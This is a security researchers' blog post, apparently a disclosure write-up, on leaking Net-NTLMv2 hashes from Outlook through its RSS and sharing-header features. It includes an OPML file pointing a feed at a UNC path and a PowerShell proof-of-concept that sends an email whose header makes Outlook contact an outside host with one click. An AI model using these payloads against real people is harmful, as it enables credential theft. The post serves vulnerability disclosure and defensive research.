|
tl;dr By leveraging sharing headers within Outlook, as with the CVE bypass we discovered, it was possible to create a Net-NTLMv2 hash leak in Outlook with one click, no warnings. Introduction This is part four of a five-part blog post series focusing on NTLM-related research that was presented as part of the DEF CON 32 presentation 'NTLM - the last ride'. After hearing the news that Microsoft is planning to kill off NTLM (New Technology Lan Manager) authentication in Windows 11 and above, we decided to speedrun coercing hashes out of a few more things before it fades into obscurity over the next twenty-five years or so. For more detail about what NTLM is, what you can do with them, and why being able to get them out of things is bad, please see our first blog post in this series (link) What is RSS? If you remember the internet in the mid to late 2000s, you probably remember RSS. If you don’t, RSS (which stands for RDF Site Summary or Really Simple Syndication, depending on who you ask) is a thing on websites that allows users and applications to access updates to websites in a computer-readable format (XML). News sites and blogs publish the RSS feeds, and then RSS reader programs would periodically fetch the feeds and display them to the user. RSS in Outlook In 2007, around about the same time as RSS was popular, Microsoft added RSS reader functionality to Outlook. Because Microsoft never removes functionality, Outlook still has this capability today. RSS feeds can be added in three ways:
The vulnerabilities We first poked around with RSS by messing with the OPML file format. OPML, or Outline Processor Markup Language, is yet another XML file format. It can be used to create a list of RSS feeds to subscribe to, which can be useful in cases such as exporting feeds from one reader when switching to another. We tried creating a .opml file with the following contents: <?xml version="1.0" encoding="UTF-8"?> <opml version="1.0"> <head> <title>Sample OPML File</title> </head> <body> <outline text="My RSS Feeds"> <outline text="Tech News" type="rss" xmlUrl="\\\\192.168.178.74\\" /> <!-- Add more RSS feed outlines as needed --> </outline> </body> </opml> Double-clicking this file opened Outlook and... it didn’t work. But back in part two (link) we learned about redirecting HTTP traffic to SMB. We changed the `xmlUrl` value to point to a HTTP redirector and this time it worked! Outlook successfully followed the redirect and leaked a Net-NTLMv2 hash. This issue was then disclosed to the MSRC team. While waiting for a response, we investigated if there were any other ways of getting Outlook to leak a hash via RSS. In the previous post we learned about the URI handlers that Outlook supports, which includes the `feed:` URI. By combining it with the `x-sharing-config-url:` email header from part 2 we can generate an email that prompts users to add an RSS feed to Outlook. As soon as they click the “Add this RSS Feed” button, their Net-NTLMv2 hash is leaked.  Fun sidenote: you can include images in CDATA tags once the feed has been imported.
Reproduction steps We provided the following PowerShell script to MS to assist with reproduction: # Create an instance of the Outlook Application $outlook = New-Object -ComObject Outlook.Application # Create a new mail item $mail = $outlook.CreateItem(0) # Set the subject of the email $mail.Subject = "Sharing Email with Custom Headers" # Set the recipients (you can add multiple recipients separated by semicolons) $mail.Recipients.Add("[email protected]") # Set the body of the email $mail.Body = "This is the body of the email." # Add custom headers $mail.PropertyAccessor.SetProperty("http://schemas.microsoft.com/mapi/string/{00020386-0000-0000-C000-000000000046}/x-sharing-config-url", "feed://privsec.nz/test.xml") $mail.PropertyAccessor.SetProperty("http://schemas.microsoft.com/mapi/string/{00020386-0000-0000-C000-000000000046}/Content-Class", "Sharing") # Send the email $mail.Send() # Display a confirmation message Write-Host "Email sent successfully." Disclosure timeline 08 May 2024: Reported to the MSRC 11 May 2024: Case opened by the MSRC 30 May 2024: Accepted as a vulnerability by MSRC but ‘Moderate’ so case closed August 2024: Disclosed at DEFCON32 Comments are closed.
|